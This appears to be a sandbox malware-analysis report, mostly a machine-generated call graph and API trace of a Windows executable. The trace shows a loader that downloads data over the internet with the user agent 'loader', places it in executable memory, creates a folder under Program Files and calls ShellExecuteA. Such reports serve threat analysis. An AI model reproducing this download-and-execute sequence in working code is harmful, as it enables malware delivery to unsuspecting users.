21712->21713 21713->21711 21716 5e8b55 21714->21716 21715 5f144d _Allocate 39 API calls 21715->21716 21716->21715 21717 5e8b70 21716->21717 21717->21707 21719 5e9d53 std::_Facet_Register RaiseException EnterCriticalSection LeaveCriticalSection 21718->21719 21720 5e149c 21719->21720 21720->21707 21722 5e832e _MallocaArrayHolder 21721->21722 21723 5e8321 21721->21723 21722->21703 21725 5e14b0 39 API calls _Allocate 21723->21725 21725->21722 21728 5e64b4 Concurrency::cancellation_token_source::~cancellation_token_source 21726->21728 21727 5e2c88 21727->21662 21728->21727 21730 5e7340 39 API calls allocator 21728->21730 21730->21727 21733 5e6656 task ctype Concurrency::cancellation_token_source::~cancellation_token_source 21731->21733 21732 5e669a task 21732->21645 21733->21732 21734 5e7570 allocator 39 API calls 21733->21734 21734->21732 21737 5e633b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21735->21737 21752 5e72b0 21737->21752 21739 5e5fb0 21785 5e70e0 21739->21785 21741 5e5fd4 21790 5e5d90 21741->21790 21743 5e4cf9 21744 5e5ed0 21743->21744 21745 5e5efb 21744->21745 21751 5e5ef7 std::ios_base::_Ios_base_dtor 21744->21751 21796 5e97c3 21745->21796 21748 5e5d90 39 API calls 21749 5e5f2a 21748->21749 21806 5e7db0 69 API calls 5 library calls 21749->21806 21751->21551 21761 5e2940 21752->21761 21755 5e76e0 69 API calls 21756 5e72dc 21755->21756 21757 5e72f7 21756->21757 21758 5e6400 40 API calls 21756->21758 21759 5e4cbb 21757->21759 21768 5e95dd 9 API calls 2 library calls 21757->21768 21758->21757 21759->21739 21769 5e2750 21761->21769 21766 5e29c6 21766->21755 21768->21759 21770 5e26b0 std::ios_base::clear 40 API calls 21769->21770 21771 5e2765 21770->21771 21772 5e9d53 21771->21772 21773 5e9d58 ___std_exception_copy 21772->21773 21774 5e29b2 21773->21774 21777 5e9d74 std::_Facet_Register 21773->21777 21782 5f2d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21773->21782 21774->21766 21781 5e1f20 44 API calls std::locale::_Init 21774->21781 21776 5ea3e9 stdext::threads::lock_error::lock_error 21784 5eb1a3 RaiseException 21776->21784 21777->21776 21783 5eb1a3 RaiseException 21777->21783 21779 5ea406 21781->21766 21782->21773 21783->21776 21784->21779 21786 5e9d53 std::_Facet_Register 3 API calls 21785->21786 21787 5e70f9 21786->21787 21789 5e710d 21787->21789 21794 5e1f20 44 API calls std::locale::_Init 21787->21794 21789->21741 21791 5e5d9f 21790->21791 21792 5e5e00 21791->21792 21795 5ee856 39 API calls 2 library calls 21791->21795 21792->21743 21794->21789 21795->21792 21797 5e971d 21796->21797 21798 5e977e 21797->21798 21800 5e97cc 42 API calls 21797->21800 21801 5e5f0c 21797->21801 21803 5e9785 21798->21803 21807 5e97cc 21798->21807 21800->21798 21801->21748 21801->21751 21803->21801 21816 5ee487 21803->21816 21806->21751 21822 5f18cf 21807->21822 21810 5f11de 21811 5f11f1 _Fputc 21810->21811 21874 5f0f35 21811->21874 21814 5eddcb _Fputc 39 API calls 21815 5f1213 21814->21815 21815->21803 21817 5ee49a _Fputc 21816->21817 21908 5ee362 21817->21908 21819 5ee4a6 21820 5eddcb _Fputc 39 API calls 21819->21820 21821 5ee4b2 21820->21821 21821->21801 21823 5f1818 CallCatchBlock 21822->21823 21824 5f182b 21823->21824 21826 5f184b 21823->21826 21847 5f2009 14 API calls __dosmaperr 21824->21847 21828 5f185d 21826->21828 21829 5f1850 21826->21829 21827 5f1830 21848 5f143d 39 API calls __strnicoll 21827->21848 21839 5f776f 21828->21839 21849 5f2009 14 API calls __dosmaperr 21829->21849 21834 5f186d 21850 5f2009 14 API calls __dosmaperr 21834->21850 21835 5f187a 21851 5f18b8 LeaveCriticalSection __fread_nolock 21835->21851 21838 5e979e 21838->21801 21838->21810 21840 5f777b CallCatchBlock 21839->21840 21852 5f150a EnterCriticalSection 21840->21852 21842 5f7789 21853 5f7813 21842->21853 21847->21827 21849->21838 21850->21838 21851->21838 21852->21842 21860 5f7836 21853->21860 21854 5f788e 21855 5f8686 _unexpected 14 API calls 21854->21855 21856 5f7897 21855->21856 21858 5f7531 ___free_lconv_mon 14 API calls 21856->21858 21859 5f78a0 21858->21859 21862 5f7796 21859->21862 21871 5f8c97 6 API calls std::_Locinfo::_Locinfo_dtor 21859->21871 21860->21854 21860->21860 21860->21862 21869 5ee89c EnterCriticalSection 21860->21869 21870 5ee8b0 LeaveCriticalSection 21860->21870 21866 5f77cf 21862->21866 21864 5f78bf 21872 5ee89c EnterCriticalSection 21864->21872 21873 5f1552 LeaveCriticalSection 21866->21873 21868 5f1866 21868->21834 21868->21835 21869->21860 21870->21860 21871->21864 21872->21862 21873->21868 21876 5f0f41 CallCatchBlock 21874->21876 21875 5f0f47 21895 5f13c0 29 API calls 2 library calls 21875->21895 21876->21875 21878 5f0f8a 21876->21878 21885 5ee89c EnterCriticalSection 21878->21885 21879 5f0f62 21879->21814 21881 5f0f96 21886 5f10b8 21881->21886 21883 5f0fac 21896 5f0fd5 LeaveCriticalSection __fread_nolock 21883->21896 21885->21881 21887 5f10de 21886->21887 21888 5f10cb 21886->21888 21897 5f0fdf 21887->21897 21888->21883 21890 5f1101 21894 5f118f 21890->21894 21901 5ee238 21890->21901 21893 5fb1b4 __wsopen_s 41 API calls 21893->21894 21894->21883 21895->21879 21896->21879 21898 5f0ff0 21897->21898 21899 5f1048 21897->21899 21898->21899 21907 5fb174 41 API calls 2 library calls 21898->21907 21899->21890 21902 5ee251 21901->21902 21906 5ee278 21901->21906 21903 5f5e72 _Fgetc 39 API calls 21902->21903 21902->21906 21904 5ee26d 21903->21904 21905 5f7204 __wsopen_s 64 API calls 21904->21905 21905->21906 21906->21893 21907->21899 21909 5ee36e CallCatchBlock 21908->21909 21910 5ee39b 21909->21910 21911 5ee378 21909->21911 21918 5ee393 21910->21918 21919 5ee89c EnterCriticalSection 21910->21919 21934 5f13c0 29 API calls 2 library calls 21911->21934 21914 5ee3b9 21920 5ee3f9 21914->21920 21916 5ee3c6 21935 5ee3f1 LeaveCriticalSection __fread_nolock 21916->21935 21918->21819 21919->21914 21921 5ee429 21920->21921 21922 5ee406 21920->21922 21924 5ee238 ___scrt_uninitialize_crt 64 API calls 21921->21924 21925 5ee421 21921->21925 21940 5f13c0 29 API calls 2 library calls 21922->21940 21926 5ee441 21924->21926 21925->21916 21936 5f78d5 21926->21936 21929 5f5e72 _Fgetc 39 API calls 21930 5ee455 21929->21930 21941 5f75fc 44 API calls _Fputc 21930->21941 21932 5ee45c 21932->21925 21933 5f7531 ___free_lconv_mon 14 API calls 21932->21933 21933->21925 21934->21918 21935->21918 21937 5f78ec 21936->21937 21938 5ee449 21936->21938 21937->21938 21939 5f7531 ___free_lconv_mon 14 API calls 21937->21939 21938->21929 21939->21938 21940->21925 21941->21932 21943 5e5ea2 21942->21943 21944 5e5e72 21942->21944 21945 5e5d90 39 API calls 21943->21945 21950 5e5c80 21944->21950 21946 5e4b52 21945->21946 21946->21566 21946->21567 21949 5ee487 69 API calls 21949->21943 21951 5e5c9d 21950->21951 21952 5e5c92 codecvt char_traits 21950->21952 21951->21949 21952->21951 21953 5eeb89 67 API calls 21952->21953 21953->21951 21955 5e5afb Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21954->21955 21956 5e72b0 71 API calls 21955->21956 21957 5e378b 21956->21957 21957->21572 21959 5e5988 21958->21959 21965 5e6da0 21959->21965 21961 5e599e 21961->21580 21976 5e3d50 21962->21976 21963 5e62f8 21963->21581 21966 5e6dd7 std::ios_base::good 21965->21966 21967 5e6dde 21966->21967 21969 5e6df9 21966->21969 21968 5e6400 40 API calls 21967->21968 21971 5e6df2 std::ios_base::good 21968->21971 21970 5e7140 40 API calls 21969->21970 21973 5e6e1c std::ios_base::getloc 21969->21973 21970->21973 21971->21961 21972 5e6400 40 API calls 21972->21971 21974 5e7890 69 API calls 21973->21974 21975 5e6e72 std::ios_base::_Ios_base_dtor ctype char_traits 21973->21975 21974->21975 21975->21971 21975->21972 21977 5e3d61 21976->21977 21978 5e5c80 67 API calls 21977->21978 21979 5e3de1 21977->21979 21980 5e3d9d 21978->21980 21979->21963 21980->21979 21981 5e3dca 21980->21981 21984 5f11a4 21980->21984 21981->21979 21990 5f0791 21981->21990 21985 5f11b7 _Fputc 21984->21985 21986 5f0f35 66 API calls 21985->21986 21987 5f11cc 21986->21987 21988 5eddcb _Fputc 39 API calls 21987->21988 21989 5f11d9 21988->21989 21989->21981 21991 5f079c 21990->21991 21992 5f07b1 21990->21992 22010 5f2009 14 API calls __dosmaperr 21991->22010 21994 5f07ce 21992->21994 21995 5f07b9 21992->21995 22004 5fa551 21994->22004 22012 5f2009 14 API calls __dosmaperr 21995->22012 21997 5f07a1 22011 5f143d 39 API calls __strnicoll 21997->22011 22001 5f07be 22013 5f143d 39 API calls __strnicoll 22001->22013 22005 5fa565 _Fputc 22004->22005 22014 5f9f5a 22005->22014 22008 5eddcb _Fputc 39 API calls 22009 5f07c9 22008->22009 22009->21979 22010->21997 22012->22001 22015 5f9f66 CallCatchBlock 22014->22015 22016 5f9f6d 22015->22016 22017 5f9f90 22015->22017 22040 5f13c0 29 API calls 2 library calls 22016->22040 22025 5ee89c EnterCriticalSection 22017->22025 22020 5f9f9e 22026 5f9fe9 22020->22026 22022 5f9fad 22041 5f9fdf LeaveCriticalSection __fread_nolock 22022->22041 22024 5f9f86 22024->22008 22025->22020 22027 5f9ff8 22026->22027 22028 5fa020 22026->22028 22045 5f13c0 29 API calls 2 library calls 22027->22045 22029 5f5e72 _Fgetc 39 API calls 22028->22029 22031 5fa029 22029->22031 22042 5fb156 22031->22042 22034 5fa0d3 22046 5fa355 44 API calls 4 library calls 22034->22046 22036 5fa0e2 22038 5fa013 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22036->22038 22037 5fa0ea 22037->22038 22047 5fa18a 43 API calls 2 library calls 22037->22047 22038->22022 22040->22024 22041->22024 22043 5faf6e 43 API calls 22042->22043 22044 5fa047 22043->22044 22044->22034 22044->22037 22044->22038 22045->22038 22046->22036 22047->22038 22049 5e7d3b std::ios_base::failure::failure 22048->22049 22050 5e7d8f Concurrency::cancellation_token_source::~cancellation_token_source 22049->22050 22054 5e8560 22049->22054 22050->21596 22052 5e7d4d 22060 5e83d0 39 API calls Concurrency::cancellation_token_source::~cancellation_token_source 22052->22060 22055 5e856f 22054->22055 22056 5e8579 22055->22056 22065 5e88e0 40 API calls std::_Xinvalid_argument 22055->22065 22061 5e88f0 22056->22061 22060->22050 22062 5e8923 Concurrency::cancellation_token_source::~cancellation_token_source 22061->22062 22063 5e7540 allocator 40 API calls 22062->22063 22064 5e8585 22063->22064 22064->22052 22065->22056 22069 5e3f50 22066->22069 22067 5e62c0 22067->21603 22071 5e3f5f std::ios_base::failure::failure _Min_value 22069->22071 22070 5e3f67 22070->22067 22071->22070 22072 5e4071 22071->22072 22075 5f0d80 22071->22075 22072->22070 22074 5f0d80 __fread_nolock 53 API calls 22072->22074 22074->22070 22078 5f0d9d 22075->22078 22080 5f0da9 CallCatchBlock 22078->22080 22079 5f0d98 22079->22071 22080->22079 22081 5f0dbc __fread_nolock 22080->22081 22082 5f0df3 22080->22082 22105 5f2009 14 API calls __dosmaperr 22081->22105 22091 5ee89c EnterCriticalSection 22082->22091 22084 5f0dfd 22092 5f0ba7 22084->22092 22086 5f0dd6 22106 5f143d 39 API calls __strnicoll 22086->22106 22091->22084 22096 5f0bb9 __fread_nolock 22092->22096 22098 5f0bd6 22092->22098 22093 5f0bc6 22108 5f2009 14 API calls __dosmaperr 22093->22108 22095 5f0bcb 22109 5f143d 39 API calls __strnicoll 22095->22109 22096->22093 22096->22098 22100 5f0c17 _Fgetc 22096->22100 22107 5f0e32 LeaveCriticalSection __fread_nolock 22098->22107 22099 5f0d42 __fread_nolock 22176 5f2009 14 API calls __dosmaperr 22099->22176 22100->22098 22100->22099 22102 5f5e72 _Fgetc 39 API calls 22100->22102 22110 5f0e3a 39 API calls 4 library calls 22100->22110 22111 5fabe3 22100->22111 22102->22100 22105->22086 22107->22079 22108->22095 22110->22100 22112 5fac0d 22111->22112 22113 5fabf5 22111->22113 22114 5faf4f 22112->22114 22123 5fac50 22112->22123 22177 5f1ff6 14 API calls __dosmaperr 22113->22177 22199 5f1ff6 14 API calls __dosmaperr 22114->22199 22116 5fabfa 22178 5f2009 14 API calls __dosmaperr 22116->22178 22118 5faf54 22200 5f2009 14 API calls __dosmaperr 22118->22200 22121 5fac5b 22179 5f1ff6 14 API calls __dosmaperr 22121->22179 22123->22121 22125 5fac02 22123->22125 22129 5fac8b 22123->22129 22124 5fac68 22201 5f143d 39 API calls __strnicoll 22124->22201 22125->22100 22126 5fac60 22180 5f2009 14 API calls __dosmaperr 22126->22180 22130 5faca4 22129->22130 22131 5facdf 22129->22131 22132 5facb1 22129->22132 22130->22132 22138 5faccd 22130->22138 22184 5f9045 22131->22184 22181 5f1ff6 14 API calls __dosmaperr 22132->22181 22134 5facb6 22182 5f2009 14 API calls __dosmaperr 22134->22182 22137 602aa1 __fread_nolock 39 API calls 22141 5fae2b 22137->22141 22138->22137 22140 5facbd 22183 5f143d 39 API calls __strnicoll 22140->22183 22144 5fae9f 22141->22144 22148 5fae44 GetConsoleMode 22141->22148 22142 5f7531 ___free_lconv_mon 14 API calls 22145 5facf9 22142->22145 22147 5faea3 ReadFile 22144->22147 22146 5f7531 ___free_lconv_mon 14 API calls 22145->22146 22149 5fad00 22146->22149 22150 5faebb 22147->22150 22151 5faf17 GetLastError 22147->22151 22148->22144 22152 5fae55 22148->22152 22153 5fad0a 22149->22153 22154 5fad25 22149->22154 22150->22151 22157 5fae94 22150->22157 22155 5fae7b 22151->22155 22156 5faf24 22151->22156 22152->22147 22158 5fae5b ReadConsoleW 22152->22158 22191 5f2009 14 API calls __dosmaperr 22153->22191 22193 5fb174 41 API calls 2 library calls 22154->22193 22174 5facc8 __fread_nolock 22155->22174 22194 5f1fae 14 API calls __dosmaperr 22155->22194 22197 5f2009 14 API calls __dosmaperr 22156->22197 22169 5faef7 22157->22169 22170 5faee0 22157->22170 22157->22174 22158->22157 22163 5fae75 GetLastError 22158->22163 22159 5f7531 ___free_lconv_mon 14 API calls 22159->22125 22163->22155 22164 5fad0f 22192 5f1ff6 14 API calls __dosmaperr 22164->22192 22165 5faf29 22198 5f1ff6 14 API calls __dosmaperr 22165->22198 22172 5faf10 22169->22172 22169->22174 22195 5fa8f5 44 API calls 3 library calls 22170->22195 22196 5fa73b 42 API calls __fread_nolock 22172->22196 22174->22159 22175 5faf15 22175->22174 22176->22095 22177->22116 22178->22125 22179->22126 22180->22124 22181->22134 22182->22140 22185 5f9083 22184->22185 22186 5f9053 _unexpected 22184->22186 22187 5f2009 __dosmaperr 14 API calls 22185->22187 22186->22185 22188 5f906e RtlAllocateHeap 22186->22188 22190 5f2d69 std::_Facet_Register EnterCriticalSection LeaveCriticalSection 22186->22190 22189 5f9081 22187->22189 22188->22186 22188->22189 22189->22142 22190->22186 22191->22164 22192->22174 22193->22138 22194->22174 22195->22174 22196->22175 22197->22165 22198->22174 22199->22118 22200->22124 22203 5e5a64 Concurrency::cancellation_token_source::~cancellation_token_source 22202->22203 22204 5e7570 allocator 39 API calls 22203->22204 22205 5e3534 22203->22205 22204->22205 22205->21612 22209 5e4750 22206->22209 22208 5e3702 22208->21614 22211 5e477e 22209->22211 22210 5e4799 22210->22208 22211->22210 22212 5e5e60 70 API calls 22211->22212 22212->22210 22214 5e4750 70 API calls 22213->22214 22215 5e4bd2 22214->22215 22215->21617 22216->21251 22220 5e1150 22217->22220 22223 5e1100 22220->22223 22224 5e111f _fread 22223->22224 22227 5f0750 22224->22227 22228 5f0764 _Fputc 22227->22228 22233 5eebc3 22228->22233 22231 5eddcb _Fputc 39 API calls 22232 5e112e ShellExecuteA ExitProcess 22231->22232 22234 5eebef 22233->22234 22235 5eec12 22233->22235 22244 5f13c0 29 API calls 2 library calls 22234->22244 22235->22234 22239 5eec1a _fread 22235->22239 22237 5eec07 22238 5ea256 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22237->22238 22240 5eed35 22238->22240 22245 5efa2d 44 API calls 2 library calls 22239->22245 22240->22231 22242 5eec9b 22246 5ef880 14 API calls ___free_lconv_mon 22242->22246 22244->22237 22245->22242 22246->22237 22247 5fba96 22252 5fb86c 22247->22252 22250 5fbad5 22253 5fb88b 22252->22253 22254 5fb89e 22253->22254 22263 5fb8b3 22253->22263 22272 5f2009 14 API calls __dosmaperr 22254->22272 22256 5fb8a3 22273 5f143d 39 API calls __strnicoll 22256->22273 22258 5fb9d3 22259 5fb8ae 22258->22259 22277 5f2009 14 API calls __dosmaperr 22258->22277 22259->22250 22269 605729 22259->22269 22261 5fba84 22278 5f143d 39 API calls __strnicoll 22261->22278 22263->22258 22274 604f99 39 API calls 2 library calls 22263->22274 22265 5fba23 22265->22258 22275 604f99 39 API calls 2 library calls 22265->22275 22267 5fba41 22267->22258 22276 604f99 39 API calls 2 library calls 22267->22276 22279 6050d1 22269->22279 22272->22256 22274->22265 22275->22267 22276->22258 22277->22261 22282 6050dd CallCatchBlock 22279->22282 22280 6050e4 22299 5f2009 14 API calls __dosmaperr 22280->22299 22282->22280 22284 60510f 22282->22284 22283 6050e9 22300 5f143d 39 API calls __strnicoll 22283->22300 22290 6056bb 22284->22290 22289 6050f3 22289->22250 22302 5f85d5 22290->22302 22296 6056f1 22297 5f7531 ___free_lconv_mon 14 API calls 22296->22297 22298 605133 22296->22298 22297->22298 22301 605166 LeaveCriticalSection __wsopen_s 22298->22301 22299->22283 22301->22289 22357 5f201c 22302->22357 22305 5f85f9 22307 5f2979 22305->22307 22369 5f2805 22307->22369 22310 605749 22394 605497 22310->22394 22313 605794 22412 5fffc3 22313->22412 22314 60577b 22426 5f1ff6 14 API calls __dosmaperr 22314->22426 22317 605780 22427 5f2009 14 API calls __dosmaperr 22317->22427 22319 6057a2 22428 5f1ff6 14 API calls __dosmaperr 22319->22428 22320 6057b9 22425 605402 CreateFileW 22320->22425 22324 6057a7 22429 5f2009 14 API calls __dosmaperr 22324->22429 22326 60586f GetFileType 22327 6058c1 22326->22327 22328 60587a GetLastError 22326->22328 22434 5fff0e 15 API calls 2 library calls 22327->22434 22432 5f1fae 14 API calls __dosmaperr 22328->22432 22329 605844 GetLastError 22431 5f1fae 14 API calls __dosmaperr 22329->22431 22331 6057f2 22331->22326 22331->22329 22430 605402 CreateFileW 22331->22430 22333 605888 CloseHandle 22333->22317 22335 6058b1 22333->22335 22433 5f2009 14 API calls __dosmaperr 22335->22433 22337 605837 22337->22326 22337->22329 22339 6058e2 22341 60592e 22339->22341 22435 605611 73 API calls 3 library calls 22339->22435 22340 6058b6 22340->22317 22345 605935 22341->22345 22437 6051ac 73 API calls 4 library calls 22341->22437 22344 605963 22344->22345 22346 605971 22344->22346 22436 5f769f 42 API calls 2 library calls 22345->22436 22348 60578d 22346->22348 22349 6059ed CloseHandle 22346->22349 22348->22296 22438 605402 CreateFileW 22349->22438 22351 605a18 22352 605a22 GetLastError 22351->22352 22353 605a4e 22351->22353 22439 5f1fae 14 API calls __dosmaperr 22352->22439 22353->22348 22355 605a2e 22440 6000d6 15 API calls 2 library calls 22355->22440 22358 5f203a 22357->22358 22364 5f2033 22357->22364 22358->22364 22366 5f642f 39 API calls 3 library calls 22358->22366 22360 5f205b 22367 5f9093 39 API calls __Getctype 22360->22367 22362 5f2071 22368 5f90f1 39 API calls __strnicoll 22362->22368 22364->22305 22365 5f8a4d 5 API calls std::_Locinfo::_Locinfo_dtor 22364->22365 22365->22305 22366->22360 22367->22362 22368->22364 22370 5f282d 22369->22370 22371 5f2813 22369->22371 22373 5f2834 22370->22373 22374 5f2853 22370->22374 22387 5f29ba 14 API calls ___free_lconv_mon 22371->22387 22386 5f281d 22373->22386 22388 5f29fb 15 API calls __wsopen_s 22373->22388 22389 5fe567 MultiByteToWideChar __strnicoll 22374->22389 22376 5f2862 22378 5f2869 GetLastError 22376->22378 22380 5f288f 22376->22380 22392 5f29fb 15 API calls __wsopen_s 22376->22392 22390 5f1fae 14 API calls __dosmaperr 22378->22390 22380->22386 22393 5fe567 MultiByteToWideChar __strnicoll 22380->22393 22381 5f2875 22391 5f2009 14 API calls __dosmaperr 22381->22391 22385 5f28a6 22385->22378 22385->22386 22386->22296 22386->22310 22387->22386 22388->22386 22389->22376 22390->22381 22391->22386 22392->22380 22393->22385 22395 6054b8 22394->22395 22400 6054d2 22394->22400 22395->22400 22448 5f2009 14 API calls __dosmaperr 22395->22448 22398 6054c7 22449 5f143d 39 API calls __strnicoll 22398->22449 22441 605427 22400->22441 22401 605539 22410 60558c 22401->22410 22452 5f3959 39 API calls 2 library calls 22401->22452 22405 605587 22408 605604 22405->22408 22405->22410 22406 60552e 22451 5f143d 39 API calls __strnicoll 22406->22451 22453 5f146a 11 API calls std::locale::_Setgloballocale 22408->22453 22410->22313 22410->22314 22411 605610 22413 5fffcf CallCatchBlock 22412->22413 22456 5f150a EnterCriticalSection 22413->22456 22415 60001d 22457 6000cd 22415->22457 22417 5ffffb 22460 5ffd9d 15 API calls 3 library calls 22417->22460 22420 5fffd6 22420->22415 22420->22417 22422 60006a EnterCriticalSection 22420->22422 22421 600000 22421->22415 22461 5ffeeb EnterCriticalSection 22421->22461 22422->22415 22423 600077 LeaveCriticalSection 22422->22423 22423->22420 22425->22331 22426->22317 22427->22348 22428->22324 22429->22317 22430->22337 22431->22317 22432->22333 22433->22340 22434->22339 22435->22341 22436->22348 22437->22344 22438->22351 22439->22355 22440->22353 22442 60543f 22441->22442 22443 60545a 22442->22443 22454 5f2009 14 API calls __dosmaperr 22442->22454 22443->22401 22450 5f2009 14 API calls __dosmaperr 22443->22450 22445 60547e 22455 5f143d 39 API calls __strnicoll 22445->22455 22448->22398 22450->22406 22452->22405 22453->22411 22454->22445 22456->22420 22462 5f1552 LeaveCriticalSection 22457->22462 22459 60003d 22459->22319 22459->22320 22460->22421 22461->22415 22462->22459 22463 5f7915 22464 5f7922 22463->22464 22468 5f793a 22463->22468 22513 5f2009 14 API calls __dosmaperr 22464->22513 22466 5f7927 22514 5f143d 39 API calls __strnicoll 22466->22514 22469 5f7999 22468->22469 22470 5fa592 _Ungetc 14 API calls 22468->22470 22477 5f7932 22468->22477 22471 5f5e72 _Fgetc 39 API calls 22469->22471 22470->22469 22472 5f79b2 22471->22472 22483 5faaca 22472->22483 22475 5f5e72 _Fgetc 39 API calls 22476 5f79eb 22475->22476 22476->22477 22478 5f5e72 _Fgetc 39 API calls 22476->22478 22479 5f79f9 22478->22479 22479->22477 22480 5f5e72 _Fgetc 39 API calls 22479->22480 22481 5f7a07 22480->22481 22482 5f5e72 _Fgetc 39 API calls 22481->22482 22482->22477 22484 5faad6 CallCatchBlock 22483->22484 22485 5faade 22484->22485 22489 5faaf9 22484->22489 22516 5f1ff6 14 API calls __dosmaperr 22485->22516 22487 5faae3 22517 5f2009 14 API calls __dosmaperr 22487->22517 22490 5fab10 22489->22490 22491 5fab4b 22489->22491 22518 5f1ff6 14 API calls __dosmaperr 22490->22518 22494 5fab69 22491->22494 22495 5fab54 22491->22495 22493 5fab15 22519 5f2009 14 API calls __dosmaperr 22493->22519 22515 5ffeeb EnterCriticalSection 22494->22515 22521 5f1ff6 14 API calls __dosmaperr 22495->22521 22497 5f79ba 22497->22475 22497->22477 22500 5fab1d 22520 5f143d 39 API calls __strnicoll 22500->22520 22501 5fab59 22522 5f2009 14 API calls __dosmaperr 22501->22522 22502 5fab6f 22503 5fab8e 22502->22503 22504 5faba3 22502->22504 22523 5f2009 14 API calls __dosmaperr 22503->22523 22508 5fabe3 __fread_nolock 51 API calls 22504->22508 22510 5fab9e 22508->22510 22509 5fab93 22524 5f1ff6 14 API calls __dosmaperr 22509->22524 22525 5fabdb LeaveCriticalSection __wsopen_s 22510->22525 22513->22466 22515->22502 22516->22487 22517->22497 22518->22493 22519->22500 22521->22501 22522->22500 22523->22509 22524->22510 22525->22497

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 005E2FD0: CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 005E2FF5
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3037
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3046
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3087
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3096
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E30E6
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E30F8
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3148
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E315A
                                                              • Sleep.KERNEL32(00000BB8,?,00608613,000000FF), ref: 005E326C
                                                              • InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 005E328D
                                                              • InternetOpenUrlA.WININET(00000000,\Ga,00000000,00000000,80000000,00000000), ref: 005E32CD
                                                              • InternetCloseHandle.WININET(?), ref: 005E32FE
                                                              • InternetCloseHandle.WININET(?), ref: 005E3361
                                                              • InternetCloseHandle.WININET(?), ref: 005E336B
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 005E338C
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E33C6
                                                              • fpos.LIBCPMTD ref: 005E3458
                                                              • fpos.LIBCPMTD ref: 005E346D
                                                              • fpos.LIBCPMTD ref: 005E349D
                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0061479C,00000024,00000040), ref: 005E34A5
                                                              • fpos.LIBCPMTD ref: 005E34D5
                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005E3504
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E33D0
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E79BD
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E7B17
                                                                • Part of subcall function 005E7990: char_traits.LIBCPMTD ref: 005E7BFC
                                                                • Part of subcall function 005E38F0: fpos.LIBCPMTD ref: 005E399A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeReadSleep
                                                              • String ID: \Ga$error$error$error$error$error $loader
                                                              • API String ID: 3533587409-2945064087
                                                              • Opcode ID: 810d476ef6555c68260c7ae8d5114b9095d8994a57e12263b2222a7098064617
                                                              • Instruction ID: 464a98828c115ff6b03c4ca2905f3b30c0b38c5f87b7250ee3970ead1ea7230d
                                                              • Opcode Fuzzy Hash: 810d476ef6555c68260c7ae8d5114b9095d8994a57e12263b2222a7098064617
                                                              • Instruction Fuzzy Hash: 5C819471E4024AAADB08EBA1DC4AFEE7B39BF98700F104558F156B71C2DF745A44CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: # l^$3 l^$C l^$S l^$c l^$s l^
                                                              • API String ID: 0-4261818416
                                                              • Opcode ID: 41584a93b1bb9d4dec22d5f0156046f5a7d4eabbb3558dd950705e9667136e92
                                                              • Instruction ID: 8b2c57ddedec786973a9fca7732cbd8425cb3c99f00d508c7b1461d8865dc1fd
                                                              • Opcode Fuzzy Hash: 41584a93b1bb9d4dec22d5f0156046f5a7d4eabbb3558dd950705e9667136e92
                                                              • Instruction Fuzzy Hash: 909184B5B006186BDF19DFB484445AEB7F7EF84610B04C92DD58AAB340EF346A06CBD6

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 005E2FF5
                                                                • Part of subcall function 005E2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 005E2CDB
                                                                • Part of subcall function 005E2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 005E2D19
                                                                • Part of subcall function 005E2CB0: task.LIBCPMTD ref: 005E2D25
                                                                • Part of subcall function 005E2CB0: task.LIBCPMTD ref: 005E2D70
                                                                • Part of subcall function 005E2CB0: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 005E2DAC
                                                                • Part of subcall function 005E2CB0: InternetCloseHandle.WININET(00000000), ref: 005E2DE6
                                                                • Part of subcall function 005E2CB0: InternetCloseHandle.WININET(00000000), ref: 005E2E02
                                                              • task.LIBCPMTD ref: 005E3037
                                                              • task.LIBCPMTD ref: 005E3046
